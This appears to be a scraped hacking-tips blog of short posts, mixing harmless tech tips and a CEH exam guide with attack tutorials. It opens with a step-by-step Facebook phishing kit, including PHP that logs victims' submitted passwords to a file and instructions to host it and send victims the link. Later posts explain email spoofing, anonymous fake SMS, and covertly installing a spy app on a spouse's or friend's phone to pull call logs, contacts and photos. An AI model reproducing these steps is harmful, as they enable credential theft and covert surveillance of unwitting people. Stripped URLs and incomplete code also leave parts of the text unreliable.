
Hack A Facebook Account By Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating a counterfeit website that looks like a real (and trusted) site. It is a hacker technique of "fishing" for passwords and other secret financial info.
So now i am starting to show you how to hack someone by phishing...
1). Go to
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.

2). Now find (Press ctrl +f)  for "action="  in that code.
You have to change two things in that code..first of all you have to change method from POST to Get and secondly you have to change ACTION from" to "next.php"
Save the document as index.html and change the file type as All Files.

3). Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

        header("Location: ");
        $handle = fopen("pswrds.txt", "a");
        foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
        fwrite($handle, "\r\n");

    save this file as "next.php"

4). Open the notepad and Now create a blank file and named it as  "pswrds.txt". Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"
Now we have to upload this three files on a php web hosting service.
I am using Its an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms.

5). Go to on and click on sign up. and select any domain name.

6). After doing above steps you have to verify your mail account that you used at the time of signup process. Verify your mail account.

7). Click on the site link which is shown under DOMAIN section to go to your control panel.

8). Now when you are logged into your account click on the Go to cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

9). After logging to Your File manager Section. Now Click on the Public_html directory.

10). Before proceeding to next delete default.php under public_html directory.Now click on the Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds.txt).

11). Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.

12). Now Everything is set. The Only thing that we have to do is that pass the link to victim. After that if he/she login through that link then we are able to get his/her account and password.
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Spam can be defined as Electronic junk mail or junk newsgroup postings. Some people define spam even more generally as any unsolicited e-mail. Real spam is generally e-mail advertising for some product sent to a mailing list.In addition to wasting people's time with unwanted e-mail, spam also eats up a lot of network bandwidth. Consequently, there are many organizations, as well as individuals, who have taken it upon themselves to fight spam with a variety of techniques. But because the Internet is public, there is really little that can be done to prevent spam, just as it is impossible to prevent junk mail. However, some online services have instituted policies to prevent spammers from spamming their subscribers.

Now how a spammer can able to get Your email id. This can be done by following ways...

1)Social networking sites.
Many people on social networking sites leave thier privacy settings to very low.Its very easy to get E-mail id or other contact information on this kind of sites. Many spammers try to concentrate on this kind of sites for generating a spam list.

2)Online Applications 
Facebook also have a large number of application support but have you ever noticed that when we add any application to our profile it asks for permission to add our personal data to their database. These application adds data like email id,contact number of user to their database and this data list can be used by a spammer for spamming purpose.

3)Web-mail Extractors e.t.c
 Web-mail miner is free application to extract Email addresses from websites ,search engines,newsgroups.the working of this software is very easy. It searches for a user defined string pattern on a domain name.i.e

There are lots of tools available in market for spamming purpose.
some of them are 123 hidden sender, direct sender, mail bomber, send blaster, e.t.c.
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Footprinting is the first and most convenient way that hackers use to gather information about computer systems and the companies they belong to. The purpose of footprinting is to learn a much you can about a system, its remote access capabilities, its ports and services,and the aspects of its security.
In order to perform a successful hack on a system,it is best to know as much as you can.

There are Mainly Two Types of Footprinting

1) DNS Footprinting
In this a hacker tries to gather information on Domain name registration on various things like,Registration details,Server Type,Ip address, Location, Contact numbers e.t.c.
There are various tools that can be used in DNS Footprinting like whois and samspade are popular tools in this category But i will recommend whois.

Let see how we can Footprint a Website by its domain.
STEP 2: Type website URL which you want to footprint. (i.e , or ip address of website) and click on Search for domain.
STEP 3: Footprinting process is now over. All information related to that domain name is in front of you. Information from its owner to its server type e.t.c. The all you have to do is to take a close look on whois record,site profile,registration,server stats Tabs. This information is very important from a hacker point of view.

2) Network Footprinting

This is a type of footprinting in which a hacker tries to gather information about Network Topology,hosts,operating system e.t.c
There are various tools which are used for Network Footprinting. But nmap is best among them all.
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Email Spoofing

E-mail spoofing is the forgery of an e-mail header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations.

Senders insert commands in headers that will alter message information. It is possible to send a message that appears to be from anyone, anywhere, saying whatever the sender wants it to say. Thus, someone could send spoofed e-mail that appears to be from you with a message that you didn't write.

Above all is just a Small explanation on what is E-mail spoofing. these are the websites which are used to send fake emails

above all  is my favourite because it provide some advance option like email-header, reply to,cc etc.

You can also send from your cmd, but for that purpose you need S.M.T.P server name of your I.S.P. so use above services only for fun.
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How To Run Android Apps On Windows

Now you can run all of the famous Android Apps on your Windows PC. This is the easiest Tutorial to all those who wants to test the apps without wasting their time.

To run Android applications on windows xp,vista or windows 7,all you need is a small android emulator which you have to install on your pc.
There are lots of android emulator exists in market but we are using one of the well known "Blue stack BETA". the earlier version is "Blue Stack Alpha" which is  only compatible with  Windows 7 PC’s and Windows 8. Best part of new beta edition is basically converting the ARM compatible Android apps to run on x86 platform and that too with a great efficiency. Or simply it means Now the software is compatible with Vista and windows7 and Windows XP also. In new Blue stack BETA Users can download applications from GetJar, 1Mobile, and Amazon and test them on windows machine. So apps will be downloaded by the software and install with in it.

After downloading install this on your windows machine and then signup by using your facebook or bluestack account. After login download android applications and run them on your windows machine..:)
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Increase Internet Speed Of your Netsetter

Idea,Airtel,Reliance,Tata Photon,Huawei And MTS Mblaze Netsetters are the most famous high-speed wireless internet service provider. All of them promise a High speed internet connection but we all know the real truth
Here today i will tried to bring out some of the tricks by which you can able to increase your net setter speed

So lets start.

1). Updating DNS Address:

Go to your Net setter connection Setting And Update your DNS address as following.
Some of the DNS servers you can use are
Google DNS :
Alternate Google DNS:

2). Optimize TCP/IP Settings:

The TCP Optimizer is a free, easy Windows program that provides an visual interface for tuning and optimizing your Internet connection.

You Can Download TCP Optimizer from here

Once you launch the program you will see a slider with range of number on it. Slide the slider to match your connection speed. If you are on Tata Photon or Reliance net connect you can try a range between 2Mbps to 3Mbps.other users can try the speed that is officially provided by your net setter.

In the Bottom most Choose settings section check ‘Optimal’ settings if you are not sure about all the settings.Now click on apply changes and exit the program.

Now Connect to internet with your net setter and see a difference in speed.
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Trick To Create A Empty Huge File

"Is it possible that a empty file can be huge as 1 million bytes.."?
Yes, off course its possible.You can create a file of any desired size by using the utilities provided by Windows.
So here's the step by step guide to create a Empty Huge File.
  1. First we have to convert the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. To use Windows calculator in scientific mode: Open calculator,click on view and select Scientific instead of Simple.
  2. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.)
  3. Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.
  4. Open Command prompt by typing "cmd" in Run.
  5. Type Command "Debug BIGFILE.DAT" without Quotes.And Ignore the File not found message.
  6. Type RCX and press Enter. Now Debug utility will display a colon prompt.
  7. Enter the last four digits of the hexadecimal number you calculated,For i.e: If your calculated Hex Code is 000F4240 Then you have to enter 4240.
  8. Type RBX and press Enter,Then Enter the First four digits of the hexadecimal number you calculated, For i.e: If your calculated Hex Code is 000F4240 Then you have to enter 000F.
  9. Enter W for Write and Q for Quit.
You have just created a Empty file of 1 million bytes..You can create empty files of any size by following these easy steps.
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How To Close Open Ports

Ports are the Application specific End points which provide connections in a operating system. When you are connected to internet each network process use a different port. For yahoo messenger uses a different port,your browser uses a different port to establish a connection with network.

To keep our self save from various kind of attacks we need to close our open ports.

To close open Ports..Here's The Procedure..
  • Go To Start And Then Run.
  • Type "netsh firewall delete portopening TCP PORTNUMBER" without Quotes and PORTNUMBER is the Number of your port which you want to close. If you want to close PORTNUMBER 8080 Then the command to close PORT 8080 is.
        netsh firewall delete portopening TCP 8080.
  • Now Press enter and Your are done..

If you are interested in coding then you can try using .vbs and .bat files too.
  • Vbs Script to close open ports..Just copy and paste below coding to notepad file and save as PortCloser.vbs
             set ss = createobject("")
             set ws = wscript
             dim PORT
             PORT = InputBox("Enter the port you wish to close:")
             ws.sleep 1000
             ss.sendkeys "firewall delete portopening TCP " & PORT
             ss.sendkeys "{enter}"
             ws.sleep 500
             'ss.sendkeys "exit"
             'ss.sendkeys "{enter}"
  • .BAT Script to close open ports..Just copy and paste below coding to notepad file and save as PortCloser.bat
             @echo off
             title Port Closer
             echo Port Closer
             set /p port=Type the port number you wish to close here:
             netsh firewall delete portopening TCP %port%
             msg /w * Port %port% has been closed.
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How To Recover Deleted Data From Computer,Pds Or Memory Cards

Sometimes we face a difficult situation when we accidentally deleted our data from computer,memory cards or pen drives and want to get it back. Many times we are lucky to get back our deleted data from recycle bin but what if the deleted data also not found in recycle bin.
There are lots of freeware and as well as shareware software available in market that claims to recover deleted data from PC, pen drive or even memory cards..Some of them works great and remaining are just scraps.

So First of all how data recovery software works..?

When we delete a file on our computer the first place it goes is to the recycle bin. Emptying the recycle bin doesn’t actually remove it instead of, it only delete a link between our computer file system to deleted file and designates the space that file is using as free space for future use.So,until a new file overwrites that space the original file is present on your hard disk. So The data recovery software only rebuilt the links between deleted data to our computer file system.
  • Recover Deleted Data using Recuva: I put recuva at top of the list because its my favorite one.Its a handy simple data recovery software by which we can recover deleted files from our PC, pen drives,memory cards and so on. To recover files  Run the software and select which type of files you want to recover and select particular drive or location and allow it to scan.After scanning it will give you a option to recover all files or selected files from your deleted location.
  • Recover Delete Data using PC Inspector File Recovery: PC Inspector File Recovery is also a great software built to recover data from FAT and NTFS file systems.Working of PC Inspector File Recovery and Recuva Is almost same.they both scan for deleted data and give us a option to recover them.
  • Recover Deleted Data using Pandora Recovery: The user interface of Pandora Recovery is about as straightforward.It Supports three kinds of searching modes Browse, Search, and Deep Scan and each has its own description so that you'll know which to choose.   
  • Recover Deleted Data using EASEUS: EASEUS is also a Free file recovery software to recover 1 GB files free of charge.It recovers files from formatted partitions with original file names and storage paths.It can also able to Recover files from Linux file system partition under Windows.   
  • Recover Deleted Data using Undelete Plus: Undelete plus is also a good file recovery software works on Win 95/98/Me/NT/2000/XP/2003 operating systems.This small software supports all Windows file systems for hard drives and floppy drives including FAT12/16/32, NTFS/NTFS5. 
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Compile And Run Java Programs On Android Phone

AIDE is an Free integrated development environment for developing real Android Apps directly on Android devices.Means You Can Easily Compile And Run Java Programs On Android Phone.AIDE is More Than A Text Editor offering advanced features like code completion, real-time error checking, re-factoring and smart code navigation, and Also It runs your App with a single click.AIDE supports almost all features of Eclipse,So when You start Writing Code In AIDE text Editor You will Surly feel a Real Compiler Environment.
Some Features Of AIDE that Makes It Different...

  • Create And Run Applications In Single Click
  • No root access required
  • Fast Compilation
  • Uses Eclipse .classpath project format for compatibility
  • Integrated Log Cat viewer
  • Real time error analysis throughout the whole project
  • Automatic Fixes for many errors Just Like Net-beans
  • Code for-matter
  • Code completion for Java and Android XML
  • Syntax highlighting for Java and XML
  • Unlimited Undo/Redo
  • Keyboard support with configurable key bindings
  • Dropbox integration

If You Want To Turn Your Mobile In To A Real Programming Machine Then Download AIDE and Enjoy..
You Can Download AIDE by Google Play By Searching AIDE in Search Bar.
After Installation Its Easy To Use..

If You Are A Java Developer And You Have Android Phone In Your Pocket..then It Is A must Try Application For You to Compile and Run Java Programs On Your Phone
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Pen drive is not showing In my Computer...Try This

Sometimes When We Insert Our Pendrive In One Of The Port Of Our CPU...Then Pendrive Is Detected By Computer Very Easily But Not Shown In My Computer Window.
This Occurs Mostly With New Pendrives Connected With Computers For First Time..If You Are Facing Pendrive Not Detecting Problem Then Its Not Your Pendrive Fault..Its Your Windows Fault.

That Kind Of Problem Comes When Window Is Failed To Allocate A Drive Letter To Inserted Pendrive.
This Problem Is Very Easy To Fix. Lets Start

1). Click On Start.

2). Click On Run,Then Type compmgmt.msc And Then Click Ok..A Computer Management Window Will Open.

3). Click On Disk Management.Then A Disk Management Window Will Appear At Right
4).On this disk management window, you can see some drives including the portable drive Or Pendrive. Right click on your Pendrive and click change drive letter and paths. A Small Window Will Appear.

5). Now Click On Change And Assign A New Drive Letter To Your Pendrive Which Is Not Used By Any Of Your Hard disk drives.

6). After assigning the new drive letter your Pendrive will show up in my computer with other drives.If Not Then Reboot Your Computer..
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How To Compile And Run C/C++ Programs On Android

Before The Official Launch of Android Phones In India,Somebody Said me that "Android Phones Are The Future of Mobile Phone Computing..They Will Take Mobile Computing To New Heights...".

Google play(Android market) also plays a important role to provide them the capability to act like Super Computer. :)

If you are using android smart phone then you Probably know that what Crucial tasks a simple android phone can perform And Everything is just because of Google Play. :)
Now a days Developer are busy in developing system applications for android to provide it functionality like a Computer. One Of the Handy Android System Application Is C4droid.

First Of All What Is C4droid..?

C4droid is a C/C++ compiler for Android.
C4droid already has almost full C language support.
Now You write your own applications on Android phone, and run them. This app uses TCC and uClibc, so it has full support of ANSI C and some support of ISO C99.

So lets Start..
1). First Of All Go To Google Play And Search For A Application Named "C4droid".

2). Download That Application And Install It On Your Android Phone.

3). Open C4droid. Now A Text Editor Will Appear In Front Of You..Write your C or C++ Code There.

4). After That You Can Able To Compile Or Run Your Code in it.. :)


C4droid Have also Many More Features Like Syntax highlighting,Compiler Selection
You Can Also Able To Supply Arguments For Your Program By just Leaving A blank Space Between Two Arguments.If you Don't Like C4droid then SouceLair Is another alternative to this.

You Can Download Source Lair By Searching "SourceLair" On Google Play(Android Market).
Source Lair Can Compile and run your C, C++, Objective-C, FORTRAN and Pascal programs right on your phone with their Cloud Based Compiler.
If You are going to Use Source Lair To Compile And Run Your Programs,Then Remember it Needs A Internet Facility On Your Phone To Interact With Their Cloud Based Compiler Server.
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How To Recover Deleted Sms From Nokia Java Based Phones

So Here's The Trick..

1). First Download And Install A Nokia Pc Suite For Your Mobile Phone.
You Can Download It From Here.

2). Connect Your Mobile Phone With Pc Suite.

3). Now Create A backup For Your Mobile Contents On Your Hard disk.

4). It Will Create A Huge Number Of .dat Files On Specified Directory.

5). Download And Install Software Named "Cygwin" From Here.
Cygwin Is A software Which Gives A linux Environment On Windows.

6). Open Cygwin And Open Your Backup Directory by Using Cd Command.
Syntax for that command Is..
Cd "full path to your specified directory". (without Quotes)

7). Then After Type "ls -al | less" without Quotes And Press Enter.
You Will See Something Like This.

total 0016
drwx------+ 2 Administrator Aks      0 Feb  6 01:35 .
drwx------+ 7 Administrator Aks      0 Feb  5 23:00 ..
-rwx------+ 1 Administrator Aks   2972 Nov 27  2003 1.dat
-rwx------+ 1 Administrator Aks  22913 Nov 27  2003 10.dat

8). Now Choose A File To Examine.

For i.e Type "strings 3102.dat | less" where 3102.dat is a file name for which you want to examine.
And Press Enter.
You Will See Some Part Of the Deleted SMS Like.

Hello How Are Yo

9). Now Just Search For The Matching Text By Using Grep Command...Now Type grep -i "Hello How Are Yo"
And Press Enter
you Will See Something Like This..

Binary file 1770.dat matches
Binary file 3102.dat matches

"3102.dat is The file That We are Examining and 1770.dat is the File That Contains the Complete SMS"

10). Now Type "strings 1770.dat" where 1770.dat is Your File Name.
And Press Enter

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Trick To Reset Memory Card Password

If anyone Set A password In Memory Card Then It Is Not Easily Recoverable.. Even It doesn't Remove After Formatting.
off-course many of Online tools and software claims that they can able to Reset Memory Card Password..But They Are Only a Waste Of time And Money..

But Friends There Is a Possible Way By Which You Can Able To Reset Memory Card Password.. I tried This Method And Works Fine For Me.

So Lets Start..
1). If You Are Using A Java Based Or Any Other Phone Then First Of all You Have To Insert Your Memory Card In To A Symbian Phone to Reset Memory Card Password..if You don't have any Symbian Phone..Contact With Your Friends You will Find it Easily..

2). After That Go To This Downloading Link And Download X-plore.. X-plore is a free symbian File Manager Utility.

3). Then Install X-plore On Your Symbian Mobile.

4). Open X-plore And Press 0 "To Show System Files".

5). After That Go To The Following Path C:/SYS/DATA/MMCSTORE with X-plore.

6). Press 3 under Options To Set It in Hex Viwer.

7). In Third Column You Will See A Line Of Code Like This... TMSD02G (c??”?x???8?2?1?2?6)

Check The Character Between '?'
Bingo Its Your Password..i.e  8216 :))
Now Reset Memory Card Password by entering this password.

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Use Cell Phone As Remote Control For Tv

Samsung Has Launched a Small FREE Android Application On Google Play by Which Anyone Can Able To use his Android Mobile Phone As A Remote Control For Tv. :)
Application Have A cool user Interference Which Works Well On A Gentle Touch.

You Can Able To Download Application From Google Play by Typing "Samsung Remote" In Search Bar.

After Downloading..Install That Application On Your Android Phone To Use Cell Phone As Remote Control For Tv.

After Installation, The all You have To Do is To Connect Your Tv and Your Cell Phone On Same Access Point.

If Your Tv Still Didn't appear On Your Smartphone Then Click On "Refresh".
It Will Soon Discover All The Tv Sets Which Are Connected To Same Access Point.As You Can Able To See In Image Below..
Click On Any of the Available Tv set And Then Enjoy A Remote Which Appear In Your Mobile Phone.
I Like Samsung Remote Because It Have The Every Option that General Tv Remote Supports.
You can Change Channels,volume levels with The help Of this.
As Well Have It Have Advance Features Like..
  • Turn Tv ON/OFF
  • Channel List
  • Smart Hub
  • Menu
  • Guide
  • Social Tv
And many More..

So What Are You Waiting For Download This Great Application And Change Your Television experience..And Impress Your Friends By Using Cell Phone As Remote Control For Tv.
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Post Your Message To All Facebook Groups In a Single Click

This is a trick By Which You can Able To Post Your message In All Or Selected Facebook Groups Of Your List In a Single Click.This Is a Small But Powerful Trick You Can Use This To promote Your Blog To All Facebook Groups.But Please Don't Misuse this Trick To Spam A lot.

So Lets Start The Trick..

1). Go To

2). Login To Your Facebook Account By using Fconnect Button.After That You will See Something Like This
3). Put Your Message In "Your Message Field."...
You Can Also Able To Put Link To Any Site Which You Want To Post With Your Message By Pasting Its URL in "Post Link (URL)" Field.

If You Want To add Any Image With Your Message And Link Then You Can Do this By Pasting The URL of Image "Post Image Link (URL)" Or Alternatively You Can Upload A Picture From Your Computer.

4). After That Select The Groups Which You Want To Publish Your Post. If You Want To Publish Your Post To All Groups Then Click Mark On "Select All".

5). Finally Click On To "Fpost" Button At The Bottom of the Page To Post Your Message In All Groups..
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Install Windows On Pendrive

So in this post i will show You how to install windows On 4 GB Pendrive :)
You can also Use 8 GB Pendrive respectively..

The process is Very Much Simple and straight forward And the best thing is about that is You need Only A single Software To do that.
When This Will be done..You will Get a Portable Windows Xp Installed On  Pendrive Or Thumbdrive,After that You can Also Able To install software On Your Pendrive :)

So Lets Begin..

1). To Install Windows XP On Pendrive First of all You Need To Download A Software Named "WinSetupFromUSB".
Download Link For Software Is

2). After Downloading Install The Software On Your Computer's Hard Disk.

3). Insert Your Pendrive Or Thumb drive.And Run The Software As You Can See In The Image Below.

4). If Your Pendrive is Not Detected Yet Then You Have To Click Refresh Button On Software To Refresh.After Detection Mark At Removable And Finally Click On HP format Tool.
After that a Window Will Open Which Looks Like This.

5). Click On the Start To Start Formatting. All the data on pendrive Will Lost In formatting make sure you Copy All The Files Before Proceeding.
After Formatting click "Close" To Close The HP Formatting Dialogue Box.

6). Now Insert The XP CD In Your Cd Rom.

7). Now Go Back To The WinSetupFromUSB Software And Press The Browse Button To Browse The Location Of the Cd,

8). Click On Go And Waits Until the Full Progress Bar.

9). After Completion Restart Your Computer And Change Your Boot Sequence and Set Pendrive Or Removable Media As A Highest Priority And You Will Be Done..

Now You have Your Windows Xp operating system In your Pocket.
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How To Prepare For CEH

Many Of Us Wants A career In Computer Security And Forensics. The Best To Get In This Field Is By Cracking Certified Ethical Hacker Exam Which Is Held By EC-COUNCIL.

What Is CEH?
CEH is A Certified Ethical Hacking Examination.When You Pass This Exam You Will Get A Certificate From EC-Council Which Says That You Are A Certified Ethical Hacker And Can Able To Penetrate Network And Found Vulnerabilities Present In that With The Permission Of Desired Firm.
Which Is The Most Recent Version Of CEH?
The Most Recent Version Of CEH is Ver 8.

What Is The Minimum Criteria To Appear In This Exam?
The Minimum Criteria To Appear In This Examination Is 2 Years of Security Field Experience. If You Don't Have This Experience Then You Have To Attend The Official Training From A EC-Council Certified Institute.

What Is The Cost Of CEH Exam.?

CEH Comes Under The Heavy Paying Exam,So If You Are Going To Take Exam Without Official Training and With 2 Years Of Security Field Experience Then You Have To Send An Non-Refundable Eligibility Application Fee Of 100 USD with The Actual Fee Of 500 USD. So Complete Cost Is Appearing As 600 USD.
And If You are Going To Take The Examination By Going Through Official Training Then You Don't Have To Send 100 USD of Eligibility Application Fee To Ec-Council. So In This Case The Total Cost Is 500 USD For Examination.

Give Me Some Exam Details of CEH V8 ?
Number Of Ques : 150
Passing Score : 70%
Test Duration : 4 Hours
Questions Type : Multiple Choice.

What Is The Difficulty Level Of This Exam ?
CEH is Neither Tough Not Very Easy. Its Syllabus Is Very Vast But Very Little Deep.You Have To Read Everything Which Is Present In 18 Modules To Crack This Exam But Not Much In Deep.

Where I Can Found The Study Material Of  CEH V8 Exam.?
  • You Have To Read Following Books To Crack The Examination..
  • Certified Ethical Hacker All In One Guide By Matt Walker.
  • Hacking Exposed 5th Edition.
  • Nmap Network Scanning official Nmap Gide To Network Discovery And Security Scanning.
  • Official Certified Ethical Hacker Review Guide By Kimberly Graves.
Give Some Tips To Crack This Examination?
  • Read 8 Hours A day, 4 Hours For Theory And 4 Hours For Practical Work.
  • CEH V7 is Made For hacking Tools So Concentrate On Hacking Tools Much.
  • SQL Injection And Port Scanning Are Very Much Important Topics Give Them Much Time For Preparation then Other Topics.
  • Use And Remember All The Switches Which Is Used With Nmap.
  • Use Hacking Forums And Google When You Found Difficulty.
  • Don't Leave Any Of the Topics Or Queries In Your Mind.You Have To Cover All The Topics And Clear All Your Queries Before Giving Examination.
  • Make Notes,Revise From Them Before The Examination.
How Much Time Certificate Will Take To Come.?
It Will Take Around 8 Weeks To Come.
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How To Spy And Trace Mobile Phone

In this post i will show you a Secrete Mobile Phone trick by which you can Spy and trace your friend,spouse or anyone's mobile phone 24 X 7 which is absolutely free..The only thing you have to do is send a sms like SENDCALLLOG To get the call history of your friend's phone.

lets Start The trick...

1). First of all go to android market from your friend,spouse,friends or anyone's phone which you want to spy.

2). Search for a android application named "Touch My life"
3). Download and install that application on that phone. Trick is Over

4). Now you can able to spy that phone anytime by just sending sms to that phone.

Now give back that phone to your friend..
and whenever you want to spy your friend just send sms from your phone to your friends phone Which  are mentioned in Touch My Life manage book.

i am mentioning some handy rules below...

1). Write "CALLMEBACK" without Quotes and Send it to your friend's mobile number for a Automatic call back from your friend's phone to your phone.

2). Write "VIBRATENSEC 30" without Quotes and send it to your friend's mobile number to Vibrate your friend's Phone for 30 seconds..You can also change Values from 30 to anything for the desired Vibrate time.

3). Write "DEFRINGTONE" without Quotes and Send it to your friend's mobile number..this will play the default ringtone on your friend's phone.

4). Write "SENDPHOTO" without Quotes and Send it to your friend's mobile will take the photo of current location of your friend and send it to the email address specified in the SMS as a will also send a confirmation message to your number.

5). Write "SENDCALLLOG" without Quotes and Send it to your friend's mobile number will send all the call details like incoming calls,outgoing calls,missed calls to the email address specified in the SMS.

6). Write "SENDCONTACTLIST" without Quotes and Send it to your friend's mobile number will send all the Contact list to the email address specified in the SMS.

So Guys Above all are only some Handy features of touch my life...You can also view more by going to touch my life application and then its manage rules.. :)

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Use Facebook Without Internet Connection

I know title Of  Post Sounds somewhat funny but friends you can use facebook with no internet connection And Even On Phones Which don't Have Internet Support.
And the best thing is that its Completely free. Facebook India has partnered with Fonetwish to bring Facebook on every mobile phone without requiring any apps or even the Internet.Now you can able to use facebook on cell phones like 1100.which don't have any browser or internet facility.

The only You have to do is to  dial *325# from your mobile phone and follow the instructions.

First of all it asks for Facebook user name and password,You have to enter these information via a number based command Prompt.

After You get in.You will see a menu like
  • news feed
  • update status
  • post on wall.
  • friend request.
  • messages.
  • notifications.
  • *Account settings.
You have to enter desired Number in a number based command prompt for accessing your account.

  • This Service is only available in India.
  • This Service Currently available On selected operators like Airtel, Aircel, Idea and Tata Docomo users.
  • Access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.

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Nokia Bluetooth trick To Keep Bluetooth ON For Forever

Using this trick you will be able to make Frustrate Your Friends by Keeping Their Blue tooth ON For Forever.

We Know That When Blue tooth Remains Enable Phone Consumes Battery At A rapid Rate.So What Will Happen If You Switch On Blue tooth Of Your Friend's Phone and they will Unable To switch it Off.
This Is Really A Nice Blue tooth Trick And Doesn't Need Any Software To Do That... :)
Lets Take A look How We can Able To Do That.

1). Just Switch On The Blue tooth Of Your Friends Phone.
2). Press *#9990# .
3). Done!! Anyone Can't able to  Switch Off Blue tooth Now.

Now If you Want To Switch off Blue tooth.Then Just Switch Off Your Phone For  5 Minutes. And then Try To switch Off Blue tooth. :)

Note: Some Nokia Phones Doesn't Support This Trick...
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Trick To Fresh Install Of Windows Xp in 10 Minutes

Formatting And Fresh Installation of Windows Xp is a lengthy and boring Process But we all Have To do that sometimes In a Month And Sometimes in A week.
Its Approx 40-60 minutes long process.But Friends Today I will Show You how To format Or Fresh Install Xp in Just 10 minutes.
So Lets Take A look.
To perform a clean installation of Windows XP, follow these steps:
  • Start your computer from the Windows XP CD. To do this, insert the Windows XP CD into your CD drive or DVD drive, and then restart your computer.
  •  Note To boot from your Windows XP CD, the BIOS settings on your computer must be configured to do this.
  •  When you see the "Press any key to boot from CD" message, press any key to start the computer from the Windows XP CD.
  •  At the Welcome to Setup screen, press ENTER to start Windows XP Setup.
  •  Read the Microsoft Software License Terms, and then press F8.
  •  Follow the instructions on the screen to select and format a partition where you want to install Windows XP.
  •  Follow the instructions on the screen to complete the Windows XP Setup.
So Above Is Only Normal Process. The main Part Begins From Here...

1). After the Copy Part is Over ... System is Rebooted as we all know In general Formatting Procedure...
Now After Reboot The Below Image Will Appear....
2). Now As This Image APPEARS You Have to Press  "Shift + F10 "  . This Will Open The command Prompt...  Now type  taskmgr  in it. This will open the Task manager .
3). After The task Manager Opens Goto Processes ... And Find "Setup.exe"  process and Right CLICK on It.... and set the Priority to Highest....
4). Now Just Wait And Watch It Will Completed In 2 minutes To 9 Minutes. Vary From System To System.

Try this trick on your Virtual Machines...Enjoy!!
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Protect Your Facebook Account

First of all i will tell you how to make your facebook account more secure by changing some settings:-

Log in to your facebook account then go to account settings then after go to security tab.
1). Secure Browsing: Enable it.
When You use secure browsing your Default Connection sets To Https Instead of Http.
Http Stands For Hyper Text Transfer Protocol. When We use Http Our Browser And Server Create Communication In Normal Language. But On the Other Hand Https stands For Hyper Text Transfer Protocol Secure, When We Use Https Browser and Server Talks In encrypted Language. So Chances Of Man In The Middle Attack Gets Reduced. In 'MITM' a Third Person or Broadly Says Hacker Can Listen The Communication Between Browser And Server.

2). LOGIN NOTIFICATIONS: Enable Login Notifications.Note: Enable Both Email And Phone Notifications.
It is Necessary To enable Login Notifications because facebook can notify you when your account is accessed from a computer or mobile device that you haven't used before.
Now Settings Part Is Completed.

So Lets Begin To Avoid The Possible Technique By Which Hacker Can Hack Your Account.
1). Keep Your Primary Email Address(ie. gmail,yahoo,hotmail e.t.c) passwords different from facebook password never Keep Both Password Same.
Lets Say if someone hacks Your facebook account and changes Your facebook  Password.. Then You can Get Back Your Password By Clicking On forget Password link.But If Both Password Are Same.Then Anybody can Change Both Passwords easily and You will Lose Your Accounts For Forever. :(
2). Many Hackers Hack Accounts Via Phishing.Phishing is an e-mail fraud method in which the hacker sends out Exactly Same Looking Website Address in an attempt to gather personal and financial information from recipients.
So Never Give Your Credentials On false Websites. If Anyone give You link Like... Or Then Never Give Your Email address and Passwords there.
Always Do give Your Password To Only "Facebook.Com"
Otherwise You Will Be hacked.

3). Keylogging Is Also A method By Which Anyone Can Got Easily Hacked.
The Entire Process Is known As Keylogging and The Software Used In it known as keylogger. Keylogger is most intelligent tool to secretly capture all typed keystrokes activities of your kids, employees, family members, relatives, friends on computer system And Save Them In A File. That File Can Be Sent To Hacker Via Internet.
To Avoid keylogging. Always Use a Good License Version Antivirus Software and Regularly Update and Scan With It.
4). Always Give A unpredictable Security Question Answer.

5). Never Add Unknown Persons In Your Account.Facebook Have A Vulnerability To bypass Security By Using Of Your Three Friends.

6). Lastly Countermeasures for Trojan
Trojan Are Dangerous Kinds Of virus They Can Work As Keyloggers And Give Hacker's a access To Your System.To Avoid Hacking With Trojan. Always Use a Good License Version Antivirus Software and Regularly Update and Scan With It.One More Important Thing Trojan Can Be Blinded Or encrypted With Any Software,Image,Video Or Any Kind of File That Makes Them Undetectable. So Never Download Anythings From suspected Sites Like ziddu Or Mediafire.

So Guys...These are the some most used methods by which profile can be hacked by hackers...So next Time when you use facebook keep remember these countermeasures. :)
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Send Fake SMS To Your Friend

In this world cell phone is very important device and this post is completly based on cell phone fake sms.

What will you do if you want to play a prank with someone with sms. The most common way is you will buy a new sim card recharge a sms voucher in it then messaging with it but this is little bit costly.

There are lots of ways to send fake sms by internet without displaying your actual contact number. This is known as sms spoofing or anonymous sms but in actual sms spoofing and anonymous sms have some difference,in sms spoofing you are free to set which number you want to display when you send a sms and in anonymous sms you send sms anonymously.

In this i will teach You about Anonymous sms.

SMSTI is a site which sends sms delivers sms instantly but sometimes supports 160 character sms.The best thing about this site is no login or registration required just go to


and start to prank people and please don't misuse it, you will be caught.
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How To Block And Unblock Websites

Using this method you can prevent others from opening various sites which can harm your computer. This is very basic information, for advanced blocking techniques you have to wait and keep following this blog
Blocking a website

1). Click Start Button and click “Run”
2).Type the following code in the “run” and press “ok”

notepad %windir%\system32\drivers\etc\hosts

3). A Pop Window is Opened.
4). You have to add ”” (without quotes) .Add this in the Notepad
5). Press CTRL+S to save the file and restart the browser
6). Finally you blocked the facebook website

Unblock An Website
Do the reverse of above
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Hiding Folders and Files in Android

So first of all
1: Install a file manager in your android phone,to do this go to Android market and search for file manager and install anyone.

2: Open the file manager and goto into the folder which you want to hide. (If you want tohide certain specific files, the put them in a folder).

3: Rename the folder starting with “.” Example: If you want to hide the “videos” folder, then rename the folder to “.videos”.

4: You are done, Android gallery and video player won’t recognize that folder anymore. If you want to unhide it, then rename the folder and remove the “.” (dot).
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Useful Commands of Network

These are some important commands that we will used later when we perform a attack on network:-

1). Ping
